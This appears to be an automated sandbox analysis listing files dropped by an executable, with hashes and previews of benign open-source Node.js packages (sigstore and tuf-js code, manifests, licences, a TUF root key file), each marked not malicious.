              SHA-512:7F13A8D688E9FD3BFD05DDE8BA9E2979C9EAEF41EE4C08D0EF9FE13326F168CC9C5425C8CE74D979FFB72534FDF0E9D3264F85DE845BC628FC08498EF00ECB2A
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.TUFError = exports.initTUF = exports.getTrustedRoot = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const protobuf_specs_1 = require("@sigstore/protobuf-specs");.const appdata_1 = require("./appdata");.const client_1 = require("./client");.const DEFAULT_CACHE_DIR = 'sigstore-js';.const DEFAULT_MIRROR_URL = 'https://tuf-repo-cdn.sigstore.dev';.const DEFAULT_TUF_ROOT_PATH = '../store/
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2766
              Entropy (8bit):4.678318610488393
              Encrypted:false
              SSDEEP:
              MD5:0135B10B05493075B74337842659A48B
              SHA1:1A2361E392CBE0DDDD29D9639F045D9B721674CA
              SHA-256:E60DE1C659CF85847EDDD31B9D345A2AFA182B192075D59740F559A0F14265E2
              SHA-512:F46D08E4B51D2D44BEB0AEBCC786B87F7D77AC93BE8027DC487ED3CCCE56AA4D8176F6F6703BE8EBBF3AE472F96EB704BAFC6A3717A9C560C7B86BAF587488A4
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.readTarget = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const fs_1 = __importDefault(require("fs"));.const error_1 = require("./error");.// Downloads and returns the specified target from the provided TUF Updater..async function readTarget(tuf
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):982
              Entropy (8bit):4.738685173976312
              Encrypted:false
              SSDEEP:
              MD5:1B4010FCAA4EBD0FC99A29F6262097C7
              SHA1:034D98913B65680E7F7BED557A1DB48696480917
              SHA-256:E499A4FBFFC462EFFD5931B6EB0B130FC50F9773E374DEC1402F910B5213A37E
              SHA-512:F05869641A19740B64E4D8DA1B9FE71A5F8CF28615AB16AA73978CE47F26CAECA359D166D829DFEA0E8ABB4543F6119ABE9951DC3D9CD4E62025BED40EF55CBB
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "@sigstore/tuf",. "version": "2.1.0",. "description": "Client for the Sigstore TUF repository",. "main": "dist/index.js",. "types": "dist/index.d.ts",. "scripts": {. "clean": "shx rm -rf dist *.tsbuildinfo",. "build": "tsc --build",. "test": "jest". },. "files": [. "dist",. "store". ],. "author": "bdehamer@github.com",. "license": "Apache-2.0",. "repository": {. "type": "git",. "url": "git+https://github.com/sigstore/sigstore-js.git". },. "bugs": {. "url": "https://github.com/sigstore/sigstore-js/issues". },. "homepage": "https://github.com/sigstore/sigstore-js/tree/main/packages/tuf#readme",. "publishConfig": {. "provenance": true. },. "devDependencies": {. "@sigstore/jest": "^0.0.0",. "@tufjs/repo-mock": "^2.0.0",. "@types/make-fetch-happen": "^10.0.0". },. "dependencies": {. "@sigstore/protobuf-specs": "^0.2.1",. "tuf-js": "^2.1.0". },. "engines": {. "node": "^16.14.0 || >=18.0.0". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):4686
              Entropy (8bit):5.6036512976076995
              Encrypted:false
              SSDEEP:
              MD5:F1B03A8DD2F5A8C2707BB56F568E201D
              SHA1:8C8D62EFF9D7E604DC63AA40677214C89AD08AF6
              SHA-256:52D5983A7E43D0DAD39805D80D704D6E8797424484D975585878155EE2E5C634
              SHA-512:1163207A6E43B710766146F44629003D8C84D065A4DB60411BADC1A5EEB260CFBBDCB72276A004BB97D2D552B80CD2782838D494F27CE5C3374F458CB8475ACE
              Malicious:false
              Reputation:unknown
              Preview:{"signed":{"_type":"root","spec_version":"1.0","version":7,"expires":"2023-10-04T13:08:11Z","keys":{"25a0eb450fd3ee2bd79218c963dce3f1cc6118badf251bf149f0bd07d5cabe99":{"keytype":"ecdsa-sha2-nistp256","scheme":"ecdsa-sha2-nistp256","keyid_hash_algorithms":["sha256","sha512"],"keyval":{"public":"-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEEXsz3SZXFb8jMV42j6pJlyjbjR8K\nN3Bwocexq6LMIb5qsWKOQvLN16NUefLc4HswOoumRsVVaajSpQS6fobkRw==\n-----END PUBLIC KEY-----\n"}},"2e61cd0cbf4a8f45809bda9f7f78c0d33ad11842ff94ae340873e2664dc843de":{"keytype":"ecdsa-sha2-nistp256","scheme":"ecdsa-sha2-nistp256","keyid_hash_algorithms":["sha256","sha512"],"keyval":{"public":"-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE0ghrh92Lw1Yr3idGV5WqCtMDB8Cx\n+D8hdC4w2ZLNIplVRoVGLskYa3gheMyOjiJ8kPi15aQ2//7P+oj7UvJPGw==\n-----END PUBLIC KEY-----\n"}},"45b283825eb184cabd582eb17b74fc8ed404f68cf452acabdad2ed6f90ce216b":{"keytype":"ecdsa-sha2-nistp256","scheme":"ecdsa-sha2-nistp256","keyid_
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1071
              Entropy (8bit):5.095161871282276
              Encrypted:false
              SSDEEP:
              MD5:FB0B62108FDE32C33BB7DEA40BF7E35F
              SHA1:E85ADB91A5A9C5FE1A425AEF38AA4A19EB66003C
              SHA-256:737A723FE0EF2B0E337E330B9F42F6B9F50D13D9B1087C2B2C6FC2486B68F8C2
              SHA-512:C791FDEC575AEF499C401F8A84635499EBDE3AF57B73AA79FB2E53DD2F3F534FFE82717A200CAE36773091F347F68404AFC7C3F3B5E1F678BFB0A43EEAED0A65
              Malicious:false
              Reputation:unknown
              Preview:MIT License..Copyright (c) 2020 Nathan Rajlich..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONN
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):846
              Entropy (8bit):4.417058406629446
              Encrypted:false
              SSDEEP:
              MD5:B2646DEA567BCD7B1191656F3CE4775F
              SHA1:99AEFD809DD0CDB49E795C6A6167BFCA8986A7B6
              SHA-256:B99A73DD3E1BE239D997B9469A09C2E09854895433D3988CD78BBF2528EC72E5
              SHA-512:903AE01D708EEC3381CB4CCB709A3AC2FD7AE6548B3EF1417C9B37EF83B02942CA26E8A51F8DBD0BB288A46CEB45FF2DEF4E39A15C0C78E672C04C20B243806C
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.function once(emitter, name, { signal } = {}) {. return new Promise((resolve, reject) => {. function cleanup() {. signal === null || signal === void 0 ? void 0 : signal.removeEventListener('abort', cleanup);. emitter.removeListener(name, onEvent);. emitter.removeListener('error', onError);. }. function onEvent(...args) {. cleanup();. resolve(args);. }. function onError(err) {. cleanup();. reject(err);. }. signal === null || signal === void 0 ? void 0 : signal.addEventListener('abort', cleanup);. emitter.on(name, onEvent);. emitter.on('error', onError);. });.}.exports.default = once;.//# sourceMappingURL=index.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):126
              Entropy (8bit):4.919774742496823
              Encrypted:false
              SSDEEP:
              MD5:68A8FE57EA8CE050BFC5D44595482CD4
              SHA1:D02F7CED9BD9E07766E12C08B3E79488F3045A31
              SHA-256:54609CEF52BBC8861A76E8F826A17BDE79154683484193D414445C2F16F2606F
              SHA-512:BD876491C0A9887C52716936C43EA59748A00AC04A73F8E54AA70EA708405FEA6B9A2D20D884483A3ED3E68D93D3BD6047F1C2E24D0C833BE8398D21A56F91B8
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.//# sourceMappingURL=overloaded-parameters.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):110
              Entropy (8bit):4.94842567840095
              Encrypted:false
              SSDEEP:
              MD5:9E3FA9DB5D4C134349185B8AC35AC371
              SHA1:4EA83CB63AE8BB9372C8C71D71BC82002DA5030D
              SHA-256:B0D2BC4142D0C62D43F996AAEB64F22C4889AC853F8A3765758B505D972D0149
              SHA-512:9E153AF0176A3EB9C340BC30C016B6FC5410466E8F4CD5CE09A73FDB98265C937C30677FBACF526FF7555C93E7DA855C8A170FD76798A74693E3FDBCC182380A
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.//# sourceMappingURL=types.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1151
              Entropy (8bit):4.64202759408148
              Encrypted:false
              SSDEEP:
              MD5:1B08C06246013DDC1F7E30734E004DF2
              SHA1:F811250E6AD2116F4A996C7AC512A2D66C5B2240
              SHA-256:0A358D669305B78F0AB46886871045BC80C13E48F4A4669762EF13452A8FAC40
              SHA-512:1572AF3781D30C62CCCA02D8F3C6812C995675EFC233446394EE7E291FEF6EB9B38EEE39A887CF4F76574D23ED32A179921FDD7D9D640239C35BBF7A099B281F
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "@tootallnate/once",. "version": "2.0.0",. "description": "Creates a Promise that waits for a single event",. "main": "./dist/index.js",. "types": "./dist/index.d.ts",. "files": [. "dist". ],. "scripts": {. "prebuild": "rimraf dist",. "build": "tsc",. "test": "jest",. "prepublishOnly": "npm run build". },. "repository": {. "type": "git",. "url": "git://github.com/TooTallNate/once.git". },. "keywords": [],. "author": "Nathan Rajlich <nathan@tootallnate.net> (http://n8.io/)",. "license": "MIT",. "bugs": {. "url": "https://github.com/TooTallNate/once/issues". },. "devDependencies": {. "@types/jest": "^27.0.2",. "@types/node": "^12.12.11",. "abort-controller": "^3.0.0",. "jest": "^27.2.1",. "rimraf": "^3.0.0",. "ts-jest": "^27.0.5",. "typescript": "^4.4.3". },. "engines": {. "node": ">= 10". },. "jest": {. "preset": "ts-jest",. "globals": {. "ts-jest": {. "diagnostics": false,. "isolate
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2020
              Entropy (8bit):5.085530089937107
              Encrypted:false
              SSDEEP:
              MD5:A9ECC4CFDD01259837A9ED3B925B0F54
              SHA1:81BE6F2022D2221F4A35A500EF14AFB81683EDB7
              SHA-256:7084E10563154AC703DB99141FF3311858E5FB5A3096381FCB69B1ECFA9EA1C5
              SHA-512:EF5EAB5079F93FBDA23B817159B599EDDDACF6DE092C5063051AD012E0C979257DE447C7C9C1C77AED49019226F8A5C80845759BA9F1478400DFB610A042905A
              Malicious:false
              Reputation:unknown
              Preview:const COMMA = ',';.const COLON = ':';.const LEFT_SQUARE_BRACKET = '[';.const RIGHT_SQUARE_BRACKET = ']';.const LEFT_CURLY_BRACKET = '{';.const RIGHT_CURLY_BRACKET = '}';..// Recursively encodes the supplied object according to the canonical JSON form.// as specified at http://wiki.laptop.org/go/Canonical_JSON. It's a restricted.// dialect of JSON in which keys are lexically sorted, floats are not allowed,.// and only double quotes and backslashes are escaped..function canoniuserze(object) {. const buffer = [];. if (typeof object === 'string') {. buffer.push(canoniuserzeString(object));. } else if (typeof object === 'boolean') {. buffer.push(JSON.stringify(object));. } else if (Number.isInteger(object)) {. buffer.push(JSON.stringify(object));. } else if (object === null) {. buffer.push(JSON.stringify(object));. } else if (Array.isArray(object)) {. buffer.push(LEFT_SQUARE_BRACKET);. let first = true;. object.forEach((element) => {. if (!first) {. bu
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):771
              Entropy (8bit):4.810238111922294
              Encrypted:false
              SSDEEP:
              MD5:57D6DAAD26741EE3FD06EE1D0717EDF5
              SHA1:5AF11D14B15BE3F1DC8A1195100EA60DE40325C9
              SHA-256:8C09F4774A7DDDB18C24D85CC833C8A847B829F87CE45F1C2A74A61A23A4F4FD
              SHA-512:58E50D7495A0D7C792F5F743202CF562E17FDB2F440B579FF96F85182BF8B06B84546761FD4286A4D33DF0684C73BA5F637D66E1EDA79E990D2465FE1AF6ABBC
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "@tufjs/canonical-json",. "version": "2.0.0",. "description": "OLPC JSON canoniuserzation",. "main": "lib/index.js",. "typings": "lib/index.d.ts",. "license": "MIT",. "keywords": [. "json",. "canonical",. "canoniuserze",. "canoniuserzation",. "crypto",. "signature",. "olpc". ],. "author": "bdehamer@github.com",. "repository": {. "type": "git",. "url": "git+https://github.com/theupdateframework/tuf-js.git". },. "homepage": "https://github.com/theupdateframework/tuf-js/tree/main/packages/canonical-json#readme",. "bugs": {. "url": "https://github.com/theupdateframework/tuf-js/issues". },. "files": [. "lib/". ],. "scripts": {. "test": "jest". },. "engines": {. "node": "^16.14.0 || >=18.0.0". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1088
              Entropy (8bit):5.090847552390311
              Encrypted:false
              SSDEEP:
              MD5:391090FCDB3D37FB9F9D1C1D0DC55912
              SHA1:138F23E4CC3BB584D7633218BCC2A773A6BBEA59
              SHA-256:564BCB001D6E131452A8E9FBA0F0CCC59E8B881F84CE3E46E319A5A33E191E10
              SHA-512:070121C80CD92001196FB15EFB152188C47FDC589B8F33B9DA5881AA9470546B82CB8A8EA96FE1073723F47149E184F1A96C2777A9FC9B45AF618C08464D6C5E
              Malicious:false
              Reputation:unknown
              Preview:MIT License..Copyright (c) 2022 GitHub and the TUF Contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):3260
              Entropy (8bit):4.8107010483949475
              Encrypted:false
              SSDEEP:
              MD5:944182B3550E06D90CC9D42D0E226713
              SHA1:5BB4861AA24A8B79A0D3226CDD0B0300465DF29F
              SHA-256:60AB48B390EB2927DEE302F4F071BEE834C07BA67226B5ADB75D9BDC8F5A3B7B
              SHA-512:0AA9D8DC234E6AADD6E21E51E0C701C62BA5B516AFFC3D4BA7CB99377A01F984E6E3A13FC6AAD07FF4B292790790DD75C82C6C743D066BE410163ECA272B6CFE
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.Signed = exports.isMetadataKind = exports.MetadataKind = void 0;.const util_1 = __importDefault(require("util"));.const error_1 = require("./error");.const utils_1 = require("./utils");.const SPECIFICATION_VERSION = ['1', '0', '31'];.var MetadataKind;.(function (MetadataKind) {. MetadataKind["Root"] = "root";. MetadataKind["Timestamp"] = "timestamp";. MetadataKind["Snapshot"] = "snapshot";. MetadataKind["Targets"] = "targets";.})(MetadataKind || (exports.MetadataKind = MetadataKind = {}));.function isMetadataKind(value) {. return (typeof value === 'string' &&. Object.values(MetadataKind).includes(value));.}.exports.isMetadataKind = isMetadataKind;./***. * A base class for the signed part of TUF metadata.. *. * Objects with base class Signed are
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):3967
              Entropy (8bit):4.612943713055329
              Encrypted:false
              SSDEEP:
              MD5:712DDA9564F6F79F229E7E52138E2BE6
              SHA1:3785C16E1479EE6B50916248A55DDBB56F2C1A41
              SHA-256:651325E74FCB6E96664761483EB07DDA1F4A7DA6DFCDE6527799E8C8FFEE769E
              SHA-512:073C6C2DC31D631ED848920269BF87ED3A437C4335AF9540096164E35087529E294EF319EC66B5791805A731ED8309F783120A035997499538A636600B5399DE
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.Delegations = void 0;.const util_1 = __importDefault(require("util"));.const error_1 = require("./error");.const key_1 = require("./key");.const role_1 = require("./role");.const utils_1 = require("./utils");./**. * A container object storing information about all delegations.. *. * Targets roles that are trusted to provide signed metadata files. * describing targets with designated pathnames and/or further delegations.. */.class Delegations {. constructor(options) {. this.keys = options.keys;. this.unrecognizedFields = options.unrecognizedFields || {};. if (options.roles) {. if (Object.keys(options.roles).some((roleName) => role_1.TOP_LEVEL_ROLE_NAMES.includes(roleName))) {. throw new error_1.ValueError('Delegated r
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1217
              Entropy (8bit):4.68638257317269
              Encrypted:false
              SSDEEP:
              MD5:01A9601D9AB7B5A1C538B2F35A136BA6
              SHA1:1B18C7BB3EE3685AB1FCAE2DF71AADB3A76338D1
              SHA-256:4EC122572002E8F15805046186DD88AECFB266154FD8CF7D30B75F5FE3ED208C
              SHA-512:CAC6422A0A10FFB17A2B988D5EE6EB95C89DE1637DC566AF6F3BB029FB2D341A0B59F0AB8A160FDEEDC7ADF4EC120563ECD5C59E2EB433795EB60F709CBCD12F
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.UnsupportedAlgorithmError = exports.CryptoError = exports.LengthOrHashMismatchError = exports.UnsignedMetadataError = exports.RepositoryError = exports.ValueError = void 0;.// An error about insufficient values.class ValueError extends Error {.}.exports.ValueError = ValueError;.// An error with a repository's state, such as a missing file..// It covers all exceptions that come from the repository side when.// looking from the perspective of users of metadata API or ngclient..class RepositoryError extends Error {.}.exports.RepositoryError = RepositoryError;.// An error about metadata object with insufficient threshold of signatures..class UnsignedMetadataError extends RepositoryError {.}.exports.UnsignedMetadataError = UnsignedMetadataError;.// An error while checking the length and hash values of an object..class LengthOrHashMismatchError extends RepositoryError {.}.exports.LengthOrHashMismatchError =
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):6613
              Entropy (8bit):4.430513906248415
              Encrypted:false
              SSDEEP:
              MD5:07D63CEEE68C1BAA5AB8188409B2D693
              SHA1:5E1E04780267A2A7EBFB7D172AD8FAFB292E9349
              SHA-256:4433D780C9BE2DB1C58D376AB3DFA49244900D3CA62916FCAF4CD6EAEA8B3537
              SHA-512:81FAAEB5654FC54931F1F81D6FE9D43FFAE18FF5F0BAE52DA214C507DDC55C649ABA2F145A7007344ABF978777BA495C486669030D02FE9EFBFDC840AC8B4508
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.TargetFile = exports.MetaFile = void 0;.const crypto_1 = __importDefault(require("crypto"));.const util_1 = __importDefault(require("util"));.const error_1 = require("./error");.const utils_1 = require("./utils");.// A container with information about a particular metadata file..//.// This class is used for Timestamp and Snapshot metadata..class MetaFile {. constructor(opts) {. if (opts.version <= 0) {. throw new error_1.ValueError('Metafile version must be at least 1');. }. if (opts.length !== undefined) {. validateLength(opts.length);. }. this.version = opts.version;. this.length = opts.length;. this.hashes = opts.hashes;. this.unrecognizedFields = opts.unrecognizedFields || {};. }
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1909
              Entropy (8bit):4.875008447682099
              Encrypted:false
              SSDEEP:
              MD5:652C1AFE64A4B41A0E73D7DF69121B48
              SHA1:82479098E6552AF8625D6D960566857B2D8667CA
              SHA-256:8960B468A312EBB4FD20F3E54771AC355954BFB9CB6155DE6639299F6C57E067
              SHA-512:D94AF4FD1D5C9F0762F51587996EED809A079A3DECAD760A95B30860C8661BE3174D5A8EB81FBF19D0471E15468457966083801D8EB8C16E12C595A9432A878B
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.Timestamp = exports.Targets = exports.Snapshot = exports.Signature = exports.Root = exports.Metadata = exports.Key = exports.TargetFile = exports.MetaFile = exports.ValueError = exports.MetadataKind = void 0;.var base_1 = require("./base");.Object.defineProperty(exports, "MetadataKind", { enumerable: true, get: function () { return base_1.MetadataKind; } });.var error_1 = require("./error");.Object.defineProperty(exports, "ValueError", { enumerable: true, get: function () { return error_1.ValueError; } });.var file_1 = require("./file");.Object.defineProperty(exports, "MetaFile", { enumerable: true, get: function () { return file_1.MetaFile; } });.Object.defineProperty(exports, "TargetFile", { enumerable: true, get: function () { return file_1.TargetFile; } });.var key_1 = require("./key");.Object.defineProperty(exports, "Key", { enumerable: true, get: function () { return key_1.Key; } });.var metadata
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):3153
              Entropy (8bit):4.557308294525896
              Encrypted:false
              SSDEEP:
              MD5:13FF075B75EB06F1FED8858E917BDA8E
              SHA1:B693912C0E07B40D81B76212DE957948DD91735D
              SHA-256:45067F50C3A8377A699FA990AF4F4DCD175BD037D22EDD31BF0F6766BBE331BA
              SHA-512:C0E6146D64FBD1179122DFB4CA4FD76D3B20AED7D420F08C9B0F3E274A657388FFAD60FE9DFA5C089E7D4692DB176CD0C2B6F9C242310D8FC262D6D4122F6F0E
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.Key = void 0;.const util_1 = __importDefault(require("util"));.const error_1 = require("./error");.const utils_1 = require("./utils");.const key_1 = require("./utils/key");.// A container class representing the public portion of a Key..class Key {. constructor(options) {. const { keyID, keyType, scheme, keyVal, unrecognizedFields } = options;. this.keyID = keyID;. this.keyType = keyType;. this.scheme = scheme;. this.keyVal = keyVal;. this.unrecognizedFields = unrecognizedFields || {};. }. // Verifies the that the metadata.signatures contains a signature made with. // this key and is correctly signed.. verifySignature(metadata) {. const signature = metadata.signatures[this.keyID];. if (!signature)
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):6247
              Entropy (8bit):4.546282112778551
              Encrypted:false
              SSDEEP:
              MD5:47C86BA3FA2E35E4200B5481900135BC
              SHA1:ABD509CE2181A214241B6887DC953BC3EF769745
              SHA-256:ACCB488FE9057007043888D02DA5B3967CB905D089BF4A314FC1997EAB4F43D1
              SHA-512:C87B97E85B35C330B3F561F9FBA1C5C963B8759BB79D4ABA675E6F99F77BF29A77792CEB4D0E7B3ADA240F30C678819F9CF8144CECF36E4553D82FC690CC2233
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.Metadata = void 0;.const canonical_json_1 = require("@tufjs/canonical-json");.const util_1 = __importDefault(require("util"));.const base_1 = require("./base");.const error_1 = require("./error");.const root_1 = require("./root");.const signature_1 = require("./signature");.const snapshot_1 = require("./snapshot");.const targets_1 = require("./targets");.const timestamp_1 = require("./timestamp");.const utils_1 = require("./utils");./***. * A container for signed TUF metadata.. *. * Provides methods to convert to and from json, read and write to and. * from JSON and to create and verify metadata signatures.. *. * ``Metadata[T]`` is a generic container type where T can be any one type of. * [``Root``, ``Timestamp``, ``Snapshot``, ``Targets``]. The purpose of this. *
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):11264
              Entropy (8bit):4.637486314735982
              Encrypted:false
              SSDEEP:
              MD5:DD388D365CD238628DB3783BBA3162AF
              SHA1:CAE1701FE14D96619CAF9EF602941D0D52E93D28
              SHA-256:5E6CAE5AB295B616FD9FB009D2CCFD9AB05861268136306F871048CF4F61D280
              SHA-512:4A28E2284B009818A649BE845D88DD7BC57018CCB798FD44D15E31BDA70F958669505D1CD9717FADE29B7D6D7E9DFE74F628F3D583212686F59D2B1034125E94
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.SuccinctRoles = exports.DelegatedRole = exports.Role = exports.TOP_LEVEL_ROLE_NAMES = void 0;.const crypto_1 = __importDefault(require("crypto"));.const minimatch_1 = require("minimatch");.const util_1 = __importDefault(require("util"));.const error_1 = require("./error");.const utils_1 = require("./utils");.exports.TOP_LEVEL_ROLE_NAMES = [. 'root',. 'targets',. 'snapshot',. 'timestamp',.];./**. * Container that defines which keys are required to sign roles metadata.. *. * Role defines how many keys are required to successfully sign the roles. * metadata, and which keys are accepted.. */.class Role {. constructor(options) {. const { keyIDs, threshold, unrecognizedFields } = options;. if (hasDuplicates(keyIDs)) {. throw new err
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4203
              Entropy (8bit):4.686655287935346
              Encrypted:false
              SSDEEP:
              MD5:59504920570A9C6902F994535685EF83
              SHA1:A963DD133F9060CC3238804AA865BDD829C47195
              SHA-256:802C47BA94B920F01A2A0A7930AE7D8816BFAC0720DC20CD28FAF1A68670261C
              SHA-512:0F3B4E383B47D48E0229DDF239605B5B50DC9E46351E2C3EECF1EDE03E566111C0EE817CA6CDE24A6FA840F8F7C1C8743790BFCEA14437686D8E9D94A3BB8929
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.Root = void 0;.const util_1 = __importDefault(require("util"));.const base_1 = require("./base");.const error_1 = require("./error");.const key_1 = require("./key");.const role_1 = require("./role");.const utils_1 = require("./utils");./**. * A container for the signed part of root metadata.. *. * The top-level role and metadata file signed by the root keys.. * This role specifies trusted keys for all other top-level roles, which may further delegate trust.. */.class Root extends base_1.Signed {. constructor(options) {. super(options);. this.type = base_1.MetadataKind.Root;. this.keys = options.keys || {};. this.consistentSnapshot = options.consistentSnapshot ?? true;. if (!options.roles) {. this.roles = role_1.TOP_LE
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):1018
              Entropy (8bit):4.427974136382877
              Encrypted:false
              SSDEEP:
              MD5:215D9970DE85DC429E2782DC7BE67982
              SHA1:339114179139EC8F2945170CE193092925BE037E
              SHA-256:2A0350DCE32EC3C94CAAFC03CF177C6D527431ED36A6C7E931D49C8E5832C265
              SHA-512:A6741445A460C1D6DEED6A650B853AD13C61578B1529A1098D60ADB0DE018BDB412D5461323120FAC0A4BFE1561ABA3C3473A3DDCE309FE36AEE0C5B4A7C2806
              Malicious:false
              Reputation:unknown
